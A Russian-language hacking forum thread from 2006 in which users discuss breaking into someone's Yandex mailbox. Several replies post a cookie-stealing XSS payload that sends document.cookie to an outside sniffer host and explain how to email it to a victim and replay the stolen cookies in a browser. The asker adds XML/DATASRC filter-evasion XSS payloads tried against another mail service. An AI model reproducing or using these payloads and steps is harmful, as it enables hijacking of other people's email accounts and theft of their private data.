Получил сессию с yandex и не знаю что с ней делат. Помогите.

Discussion in 'Песочница' started by m2infect, 26 Jun 2006.

  1. m2infect

    m2infect Elder - Старейшина

    Joined:
    20 Jun 2006
    Messages:
    34
    Likes Received:
    4
    Reputations:
    3
    IP=XX.XX.XX.Xx SITE=mail.yandex.ru
    REFERER=http://mail.yandex.ru/msg?mesid=9000000000023702702&folder=9000010000001704418
    QUERY=
    AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TISA)

    Господа, что-то я запутался во всем этом.
    Как получить с помощью этого доступ в ящик?
    :confused:
     
    #1 m2infect, 26 Jun 2006
    Last edited: 26 Jun 2006
  2. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    У тебя Query= пустая, в ней куки должны были прити. Так что это безполезная инфа.
     
  3. m2infect

    m2infect Elder - Старейшина

    Joined:
    20 Jun 2006
    Messages:
    34
    Likes Received:
    4
    Reputations:
    3
    Может и не правельно задам вопрос.
    Но все же.
    А что сделал не так. Присылаю письмо, его отткрываю, и снифф срабатыет. Сессию получил, а куки нет. Что я не так сделал.?
     
  4. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    ты получил не сессию , а id письма и id папки

    2) идентификация пользователя на яндексе идёт только через cookies
     
  5. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    А ты описание к сниферу читал

    HTML:
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
     
  6. Sol-leks

    Sol-leks New Member

    Joined:
    14 May 2006
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    В итоге:
    Ты видимо не тот скрипт указал, к своему способу..
    Читай описание hidden'a.
    Чтобы впихнуть свои куки юзай "Оперу": Интсрументы - Настройки - Дополнительно - Cookies - Управление Cookies, дальше будет видно какие циферки на что заменять...
     
  7. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    нет, просто он указал как гиперссылку, а не как картинку и .т.д хидден всё верно указал, тока это наверное не пройдёт. хех это не старые-добрые времена, думаю вы меня поняли
     
  8. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Есть способ через народ, я ему уже обьяснил, в пм.
     
    #8 hidden, 27 Jun 2006
    Last edited: 1 Jul 2006
  9. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Со сниффером не пройдёт? Да ну.. Зашифровать снифф, и кинуть, если ты про это говоришь.
     
  10. ~Fenix~

    ~Fenix~ Banned

    Joined:
    26 Jul 2005
    Messages:
    190
    Likes Received:
    50
    Reputations:
    6
    Это уже обсуждалось, вобщем в код картинки вставляеш скрипт
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    и отправляеш ее месте с письмом, ну и ждеш куков) если пользователь кот отправляеш полный лох и решит посмотреть твою фотку)​
     
  11. m2infect

    m2infect Elder - Старейшина

    Joined:
    20 Jun 2006
    Messages:
    34
    Likes Received:
    4
    Reputations:
    3
    др. почтовый севис - отличный от яндекса.
    Ставлю в письме
    <XML ID="xss"><I><B>&lt;IMG SRC="javas<!---->cript:alert('123')"&gt;</B></I></XML>
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

    пишет - 123

    ставлю

    <XML ID="xss"><I><B>&lt;IMG SRC="javas<!---->cript:img = new Image(); img.src ="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
    )"&gt;</B></I></XML>
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

    и ставил просто ссылку, и кодировал в чар код, и редактировал все это, убираяя лишние пробелы. Результат - 0.
    Вывод - нужно более экзоичным способом запостить туда скррипт со снифом, либо руки можно мне поломать.

    Господа, отвечайте по существу.
    С уважением!
     
    #11 m2infect, 1 Jul 2006
    Last edited: 1 Jul 2006
  12. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    Товариш а ты не думал что тама не лохи сидят и тама фильтры стоят?)
     
Loading...
Similar Threads - Получил сессию yandex
  1. Torchin
    Replies:
    4
    Views:
    3,040